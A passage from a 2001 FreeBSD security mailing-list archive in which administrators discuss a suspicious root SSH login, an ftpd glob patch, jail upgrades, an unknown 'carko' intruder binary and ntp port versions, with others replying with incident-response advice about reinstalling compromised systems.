19 07:22:54 web sshd[35725]: log: ROOT LOGIN as 'root' from phix-it.com Apr 19 07:27:34 web sshd[35725]: fatal: Local: Command terminated on signal 9. How is this possible? Nicholas. __________________________________________________ Do You Yahoo!? Yahoo! Invites – Get the whole gang together! http://invites.yahoo.com.sg/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 17: 1:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (skin-flute.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 0FEEB37B422 for ; Wed, 18 Apr 2001 17:01:50 -0700 (PDT) (envelope-from geniusj@bluenugget.net) Received: from worsehalf (sf-gw.epylon.com [63.93.9.98]) by bluenugget.net (Postfix) with ESMTP id 4E43613706; Wed, 18 Apr 2001 17:04:20 -0700 (PDT) Message-ID: <006901c0c864$42874520$4904a8c0@epylon.lan> From: "Jason DiCioccio" To: "Nicholas Tan" , References: <20010418235008.66296.qmail@web13601.mail.yahoo.com> Subject: Re: sshd hacked? Date: Wed, 18 Apr 2001 17:04:09 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2462.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Perhaps someone or you modified your sshd config? - ----- Original Message ----- From: "Nicholas Tan" To: Sent: Wednesday, April 18, 2001 4:50 PM Subject: Re: sshd hacked? > Hi, > > This happened earlier, i'm running 4.2-stable: > > Apr 19 07:22:54 web sshd[35725]: log: ROOT LOGIN as > 'root' from phix-it.com > Apr 19 07:27:34 web sshd[35725]: fatal: Local: Command > terminated on signal 9. > > How is this possible? > > Nicholas. > > __________________________________________________ > Do You Yahoo!? > Yahoo! Invites - Get the whole gang together! > http://invites.yahoo.com.sg/ > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use iQA/AwUBOt4rdlCmU62pemyaEQK5kwCfZd8A/HxWv3MXoEUipQ1OF2kS4dAAoPCc Wpnqbau2Yc3c3/mVeMyRkCe4 =AW3Q -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 17:50: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from pi.yip.org (yip.org [199.45.111.121]) by hub.freebsd.org (Postfix) with ESMTP id D783337B422; Wed, 18 Apr 2001 17:50:04 -0700 (PDT) (envelope-from melange@yip.org) Received: from localhost (melange@localhost) by pi.yip.org (8.11.1/8.11.1) with ESMTP id f3J0o3U58204; Wed, 18 Apr 2001 20:50:04 -0400 (EDT) (envelope-from melange@yip.org) Date: Wed, 18 Apr 2001 20:50:03 -0400 (EDT) From: Bob K To: security@FreeBSD.ORG, stable@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) In-Reply-To: <200104181209.JAA64497@ns1.via-net-works.net.ar> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=iso-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Apr 2001, Fernando Schapachnik wrote: > En un mensaje anterior, Chris Faulhaber escribi=F3: > > > Where are GLOB_LIMIT and GLOB_MAXPATH supposed to be defined? > > >=20 > >=20 > > The advisory patch is missing the glob.h patch along with the > > instruction to copy the resulting glob.h to /usr/include. > >=20 > > Quick fix is to either get the diff or entire file from > > http://www.FreeBSD.org/cgi/cvsweb.cgi/src/include/glob.h, > > copy the resulting file to /usr/include and build. >=20 > Obviously, it worked. Thanks! Just wanted to report that this also worked on a 4.1-STABLE-20001016 snapshot. --=20 Bob | "Villain, I have done thy mother" =09=09=09- Shakespeare, Titus Andronicus, act IV, scene II To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 18:43:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from fud.indifference.org (cr597818-a.crdva1.bc.wave.home.com [24.113.89.211]) by hub.freebsd.org (Postfix) with SMTP id D0AAB37B422 for ; Wed, 18 Apr 2001 18:43:10 -0700 (PDT) (envelope-from kj@indifference.org) Received: (qmail 18833 invoked by uid 1000); 19 Apr 2001 01:43:05 -0000 Date: Wed, 18 Apr 2001 18:43:05 -0700 From: kj To: freebsd-security@freebsd.org Subject: jail upgrade Message-ID: <20010418184305.A18763@indifference.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hey, all. I have two jails on my server. When I do a make world on the actual OS, does it matter if I upgrade the jails as well? I have changed a lot of file/dir permissions and so on, and would rather just leave the jail file systems alone. I am just wondering if I don't upgrade the jails, would things start to break? Thanks, K.J. -- http://www.indifference.org "The downfall of mankind will be his indifference...ah, but who cares." ---------- In God we trust...everything else we use X.509 ----------- 1024D/57E3FDF9 2001-04-18 KJ Hartung Key fingerprint = 1C2C 6CE7 A351 11D1 A5B0 741A DCCA 22C4 57E3 FDF9 2048g/D157ACC1 2001-04-18 --------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 19:41:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from atom.alles.or.jp (atom.alles.or.jp [210.231.151.1]) by hub.freebsd.org (Postfix) with ESMTP id 2F9A537B422 for ; Wed, 18 Apr 2001 19:41:08 -0700 (PDT) (envelope-from fukuda@alles.ad.jp) Received: from fukuda.alles.ad.jp (tokyo-gw.alles.or.jp [210.231.143.251]) by atom.alles.or.jp (8.11.1/3.7W/allesnet) with SMTP id f3J2f0E01041 for ; Thu, 19 Apr 2001 11:41:01 +0900 (JST) Message-Id: <200104190241.AA00733@fukuda.alles.ad.jp> From: fukuda shinichi Date: Thu, 19 Apr 2001 11:41:00 +0900 To: freebsd-security@freebsd.org Subject: unknown process MIME-Version: 1.0 X-Mailer: AL-Mail32 Version 1.11 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi. I found unknown process name "carko" today. This binary find in /usr/share/man/mansps/ddos , and i never made such dir like ddos !! (created Apr 18 18:59). Is anyone know about this "carko" ? And very weird name "ddos" ... please help me. Thnak you . --------- shin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 20: 2:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id A94F037B422 for ; Wed, 18 Apr 2001 20:02:24 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id CCCF466B38; Wed, 18 Apr 2001 20:02:23 -0700 (PDT) Date: Wed, 18 Apr 2001 20:02:23 -0700 From: Kris Kennaway To: fukuda shinichi Cc: freebsd-security@FreeBSD.ORG Subject: Re: unknown process Message-ID: <20010418200223.A42227@xor.obsecurity.org> References: <200104190241.AA00733@fukuda.alles.ad.jp> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="NzB8fVQJ5HfG6fxh" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104190241.AA00733@fukuda.alles.ad.jp>; from fukuda@alles.ad.jp on Thu, Apr 19, 2001 at 11:41:00AM +0900 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --NzB8fVQJ5HfG6fxh Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 11:41:00AM +0900, fukuda shinichi wrote: > Hi. >=20 > I found unknown process name "carko" today. > This binary find in /usr/share/man/mansps/ddos ,=20 > and i never made such dir like ddos !! (created Apr 18 18:59). >=20 > Is anyone know about this "carko" ?=20 > And very weird name "ddos" ... please help me. Take your system off the net and check it for signs of intrusion. Kris --NzB8fVQJ5HfG6fxh Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE63lU/Wry0BWjoQKURAlAwAJ40fYE17MVKQFxzBkbEO4SREtw4tQCeLAjE BB9A06a+etaWXO+LT/okIks= =o8HH -----END PGP SIGNATURE----- --NzB8fVQJ5HfG6fxh-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 20:24:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by hub.freebsd.org (Postfix) with ESMTP id 72F3737B43C for ; Wed, 18 Apr 2001 20:24:26 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: (from danderse@localhost) by faith.cs.utah.edu (8.9.3/8.9.3) id VAA14081; Wed, 18 Apr 2001 21:24:19 -0600 (MDT) Message-Id: <200104190324.VAA14081@faith.cs.utah.edu> Subject: Re: unknown process To: kris@obsecurity.org (Kris Kennaway) Date: Wed, 18 Apr 2001 21:24:19 -0600 (MDT) Cc: fukuda@alles.ad.jp (fukuda shinichi), freebsd-security@FreeBSD.ORG In-Reply-To: <20010418200223.A42227@xor.obsecurity.org> from "Kris Kennaway" at Apr 18, 2001 08:02:23 PM From: "David G. Andersen" X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There was an analysis of this posted to ISN today: http://www.securityfocus.com/templates/archive.pike?list=12&mid=177354 You've been hacked. Do what Kris said immediately - take your system offline, and figure out how they got in. You'll likely need to either restore from backups, a fresh install, or check your tripwire/etc logs to determine what else the intruder changed, if they installed a rootkit, etc. -Dave Lo and behold, Kris Kennaway once said: > > > --NzB8fVQJ5HfG6fxh > Content-Type: text/plain; charset=us-ascii > Content-Disposition: inline > Content-Transfer-Encoding: quoted-printable > > On Thu, Apr 19, 2001 at 11:41:00AM +0900, fukuda shinichi wrote: > > Hi. > >=20 > > I found unknown process name "carko" today. > > This binary find in /usr/share/man/mansps/ddos ,=20 > > and i never made such dir like ddos !! (created Apr 18 18:59). > >=20 > > Is anyone know about this "carko" ?=20 > > And very weird name "ddos" ... please help me. > > Take your system off the net and check it for signs of intrusion. > > Kris > > --NzB8fVQJ5HfG6fxh > Content-Type: application/pgp-signature > Content-Disposition: inline > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.4 (FreeBSD) > Comment: For info see http://www.gnupg.org > > iD8DBQE63lU/Wry0BWjoQKURAlAwAJ40fYE17MVKQFxzBkbEO4SREtw4tQCeLAjE > BB9A06a+etaWXO+LT/okIks= > =o8HH > -----END PGP SIGNATURE----- > > --NzB8fVQJ5HfG6fxh-- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 20:40:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from ogyo.pointer-software.com (ogyo.pointer-software.com [210.164.96.147]) by hub.freebsd.org (Postfix) with ESMTP id C1EB437B42C for ; Wed, 18 Apr 2001 20:40:13 -0700 (PDT) (envelope-from horio@pointer-software.com) Received: from long.near.this (long.near.this [10.0.172.9]) by ogyo.pointer-software.com (8.11.1/8.11.1) with ESMTP id f3J3eAF32195; Thu, 19 Apr 2001 12:40:10 +0900 (JST) Received: from pointer-software.com (char.near.this [10.0.172.11]) by long.near.this (8.11.1/8.9.3) with ESMTP id f3J3e9P54853; Thu, 19 Apr 2001 12:40:09 +0900 (JST) Message-ID: <3ADE5E18.270D87F4@pointer-software.com> Date: Thu, 19 Apr 2001 12:40:08 +0900 From: horio shoichi X-Mailer: Mozilla 4.76 [ja] (X11; U; Linux 2.2.18pre21 i686) X-Accept-Language: en, ja MIME-Version: 1.0 To: fukuda shinichi Cc: freebsd-security@FreeBSD.ORG Subject: Re: unknown process References: <200104190241.AA00733@fukuda.alles.ad.jp> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org See incidents@securityfocus.com archive of this week. horio shoichi fukuda shinichi wrote: > > Hi. > > I found unknown process name "carko" today. > This binary find in /usr/share/man/mansps/ddos , > and i never made such dir like ddos !! (created Apr 18 18:59). > > Is anyone know about this "carko" ? > And very weird name "ddos" ... please help me. > > Thnak you . > > --------- > shin > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 21:22: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.OBK.ru (ovk.barrt.ru [194.84.233.130]) by hub.freebsd.org (Postfix) with ESMTP id AB88937B43E for ; Wed, 18 Apr 2001 21:21:57 -0700 (PDT) (envelope-from subs@ovk.altai.ru) Received: from localhost (subs@localhost) by proxy.OBK.ru (8.9.3/8.9.3) with ESMTP id LAA35778 for ; Thu, 19 Apr 2001 11:21:53 +0700 (NOVST) (envelope-from subs@ovk.altai.ru) Date: Thu, 19 Apr 2001 11:21:53 +0700 (NOVST) From: "Yuri A. Wolf" X-Sender: subs@proxy.obk.ru To: freebsd-security@freebsd.org Subject: ntp-4.0.99k23? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello After I upgraded to ntp-4.0.99k_2 I noted that ntp port changed again to ntp-4.0.99k23. Is the 1st one vulnerable? Is the 2d one ok? -- Yuri Wolf wolf@ovk.altai.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 21:27:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from casimir.physics.purdue.edu (casimir.physics.purdue.edu [128.210.146.111]) by hub.freebsd.org (Postfix) with ESMTP id 4259837B422 for ; Wed, 18 Apr 2001 21:27:40 -0700 (PDT) (envelope-from will@physics.purdue.edu) Received: by casimir.physics.purdue.edu (Postfix, from userid 1000) id 9B6CE1BD72; Wed, 18 Apr 2001 23:25:16 -0500 (EST) Date: Wed, 18 Apr 2001 23:25:16 -0500 From: Will Andrews To: "Yuri A. Wolf" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ntp-4.0.99k23? Message-ID: <20010418232516.V5017@casimir.physics.purdue.edu> Reply-To: Will Andrews References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="4cokgWgqjr3t8EL1" Content-Disposition: inline User-Agent: Mutt/1.3.15i In-Reply-To: ; from subs@ovk.altai.ru on Thu, Apr 19, 2001 at 11:21:53AM +0700 X-Operating-System: Linux 2.2.18 sparc64 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --4cokgWgqjr3t8EL1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 11:21:53AM +0700, Yuri A. Wolf wrote: > After I upgraded to ntp-4.0.99k_2 I noted that ntp port changed again to > ntp-4.0.99k23. >=20 > Is the 1st one vulnerable? Is the 2d one ok? Neither are vulnerable. --=20 wca --4cokgWgqjr3t8EL1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE63misF47idPgWcsURAsH+AJ9a6jEQi14LrKu0z6Af5/9k5cfJywCcCngZ iZMxVyY8emfOP54KwfMVwGs= =t0eV -----END PGP SIGNATURE----- --4cokgWgqjr3t8EL1-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 21:32:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 4692637B423 for ; Wed, 18 Apr 2001 21:32:34 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id VAA09506; Wed, 18 Apr 2001 21:31:44 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda09504; Wed Apr 18 21:31:43 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3J4Vcv42443; Wed, 18 Apr 2001 21:31:38 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdW42323; Wed Apr 18 21:31:03 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3J4V3S54698; Wed, 18 Apr 2001 21:31:03 -0700 (PDT) Message-Id: <200104190431.f3J4V3S54698@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdB54674; Wed Apr 18 21:30:40 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: "Yuri A. Wolf" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ntp-4.0.99k23? In-reply-to: Your message of "Thu, 19 Apr 2001 11:21:53 +0700." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 18 Apr 2001 21:30:40 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , "Yuri A. Wo lf" writes: > Hello > > After I upgraded to ntp-4.0.99k_2 I noted that ntp port changed again to > ntp-4.0.99k23. > > Is the 1st one vulnerable? Is the 2d one ok? Both are invulnerable. 4.0.99k_2 is patched by the port (see the files directory) to fix the vulnerability. 4.0.99k23 has the patches for the vulnerability built into it. In the end both are equivalent. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 21:40: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.OBK.ru (ovk.barrt.ru [194.84.233.130]) by hub.freebsd.org (Postfix) with ESMTP id 2422037B422 for ; Wed, 18 Apr 2001 21:39:58 -0700 (PDT) (envelope-from subs@ovk.altai.ru) Received: from localhost (subs@localhost) by proxy.OBK.ru (8.9.3/8.9.3) with ESMTP id LAA36543; Thu, 19 Apr 2001 11:38:48 +0700 (NOVST) (envelope-from subs@ovk.altai.ru) Date: Thu, 19 Apr 2001 11:38:48 +0700 (NOVST) From: "Yuri A. Wolf" X-Sender: subs@proxy.obk.ru To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: ntp-4.0.99k23? In-Reply-To: <200104190431.f3J4V3S54698@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Apr 2001, Cy Schubert - ITSD Open Systems Group wrote: > > Is the 1st one vulnerable? Is the 2d one ok? > > Both are invulnerable. 4.0.99k_2 is patched by the port (see the files > directory) to fix the vulnerability. 4.0.99k23 has the patches for the > vulnerability built into it. In the end both are equivalent. > Ok, thank you. Those differences in files directory was the reason of my question. -- Yuri Wolf wolf@ovk.altai.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 2:31:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id A7C9C37B43C for ; Thu, 19 Apr 2001 02:31:28 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA31858; Thu, 19 Apr 2001 11:31:27 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "David G. Andersen" Cc: kris@obsecurity.org (Kris Kennaway), fukuda@alles.ad.jp (fukuda shinichi), freebsd-security@FreeBSD.ORG Subject: Re: unknown process References: <200104190324.VAA14081@faith.cs.utah.edu> From: Dag-Erling Smorgrav Date: 19 Apr 2001 11:31:26 +0200 In-Reply-To: <200104190324.VAA14081@faith.cs.utah.edu> Message-ID: Lines: 13 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "David G. Andersen" writes: > You've been hacked. Do what Kris said immediately - take your > system offline, and figure out how they got in. You'll likely > need to either restore from backups, a fresh install, or check > your tripwire/etc logs to determine what else the intruder > changed, if they installed a rootkit, etc. It's not either/or. The only acceptable solution to this situation is a complete reinstall from a trusted source (e.g. original CD set). DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 2:41: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 5E33A37B43C for ; Thu, 19 Apr 2001 02:40:55 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 469 invoked by uid 1000); 19 Apr 2001 09:39:16 -0000 Date: Thu, 19 Apr 2001 12:39:15 +0300 From: Peter Pentchev To: Dag-Erling Smorgrav Cc: "David G. Andersen" , Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG Subject: Re: unknown process Message-ID: <20010419123915.A446@ringworld.oblivion.bg> Mail-Followup-To: Dag-Erling Smorgrav , "David G. Andersen" , Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG References: <200104190324.VAA14081@faith.cs.utah.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Thu, Apr 19, 2001 at 11:31:26AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 19, 2001 at 11:31:26AM +0200, Dag-Erling Smorgrav wrote: > "David G. Andersen" writes: > > You've been hacked. Do what Kris said immediately - take your > > system offline, and figure out how they got in. You'll likely > > need to either restore from backups, a fresh install, or check > > your tripwire/etc logs to determine what else the intruder > > changed, if they installed a rootkit, etc. > > It's not either/or. The only acceptable solution to this situation is > a complete reinstall from a trusted source (e.g. original CD set). ..and during the install, examine your backups - people have been known to restore systems from backup, only to find out that the intrusion had happened *before* the backup; sometimes there are months and months of accurately backed up backdoors and stuff. G'luck, Peter -- Thit sentence is not self-referential because "thit" is not a word. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 2:48:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from serenity.mcc.ac.uk (serenity.mcc.ac.uk [130.88.200.93]) by hub.freebsd.org (Postfix) with ESMTP id D6D0C37B43C for ; Thu, 19 Apr 2001 02:48:20 -0700 (PDT) (envelope-from rasputin@freebsd-uk.eu.org) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97] ident=root) by serenity.mcc.ac.uk with esmtp (Exim 2.05 #4) id 14qB2y-000MIb-00 for security@freebsd.org; Thu, 19 Apr 2001 10:48:20 +0100 Received: (from rasputin@localhost) by dogma.freebsd-uk.eu.org (8.11.1/8.11.1) id f3J9mJr25752 for security@freebsd.org; Thu, 19 Apr 2001 10:48:19 +0100 (BST) (envelope-from rasputin) Date: Thu, 19 Apr 2001 10:48:19 +0100 From: Rasputin To: security@freebsd.org Subject: Re: unknown process Message-ID: <20010419104819.A25707@dogma.freebsd-uk.eu.org> Reply-To: Rasputin References: <200104190324.VAA14081@faith.cs.utah.edu> <20010419123915.A446@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20010419123915.A446@ringworld.oblivion.bg>; from roam@orbitel.bg on Thu, Apr 19, 2001 at 12:39:15PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Peter Pentchev [010419 10:42]: > On Thu, Apr 19, 2001 at 11:31:26AM +0200, Dag-Erling Smorgrav wrote: > > "David G. Andersen" writes: > > > You've been hacked. Do what Kris said immediately - take your > > > system offline, and figure out how they got in. You'll likely > > > need to either restore from backups, a fresh install, or check > > > your tripwire/etc logs to determine what else the intruder > > > changed, if they installed a rootkit, etc. > > > > It's not either/or. The only acceptable solution to this situation is > > a complete reinstall from a trusted source (e.g. original CD set). Just a though - do the cvs servers count as 'trusted'? How feasible would it be to cvsup and installworld? I'd personally go for reinstalling the compiler, cvsup binary, networking packages, etc from CD first - that probably wouldn't be enough, though, would it? -- Rasputin Jack of All Trades :: Master of Nuns To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 2:56: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 70CC337B43C for ; Thu, 19 Apr 2001 02:56:03 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 5205 invoked by uid 1000); 19 Apr 2001 09:54:27 -0000 Date: Thu, 19 Apr 2001 12:54:27 +0300 From: Peter Pentchev To: Rasputin Cc: security@freebsd.org Subject: Re: unknown process Message-ID: <20010419125426.B446@ringworld.oblivion.bg> Mail-Followup-To: Rasputin , security@freebsd.org References: <200104190324.VAA14081@faith.cs.utah.edu> <20010419123915.A446@ringworld.oblivion.bg> <20010419104819.A25707@dogma.freebsd-uk.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010419104819.A25707@dogma.freebsd-uk.eu.org>; from rara.rasputin@virgin.net on Thu, Apr 19, 2001 at 10:48:19AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 19, 2001 at 10:48:19AM +0100, Rasputin wrote: > * Peter Pentchev [010419 10:42]: > > On Thu, Apr 19, 2001 at 11:31:26AM +0200, Dag-Erling Smorgrav wrote: > > > "David G. Andersen" writes: > > > > You've been hacked. Do what Kris said immediately - take your > > > > system offline, and figure out how they got in. You'll likely > > > > need to either restore from backups, a fresh install, or check > > > > your tripwire/etc logs to determine what else the intruder > > > > changed, if they installed a rootkit, etc. > > > > > > It's not either/or. The only acceptable solution to this situation is > > > a complete reinstall from a trusted source (e.g. original CD set). > > Just a though - do the cvs servers count as 'trusted'? > How feasible would it be to cvsup and installworld? > > I'd personally go for reinstalling the compiler, cvsup binary, > networking packages, etc from CD > first - that probably wouldn't be enough, though, would it? If you're doing this on the same machine, you should also watch out for kernel modules, rc scripts and stuff.. I say a clean install, and then.. if the previous setup had been right.. all the additional programs and configs should be easily rebuilt/restored from CVS or similar. As to the data, and DATA ONLY, backups should be safe. G'luck, Peter -- I am jealous of the first word in this sentence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 3:38:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id DC09337B424 for ; Thu, 19 Apr 2001 03:37:56 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id MAA32082; Thu, 19 Apr 2001 12:37:11 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Peter Pentchev Cc: "David G. Andersen" , Kris Kennaway , fukuda shinichi , 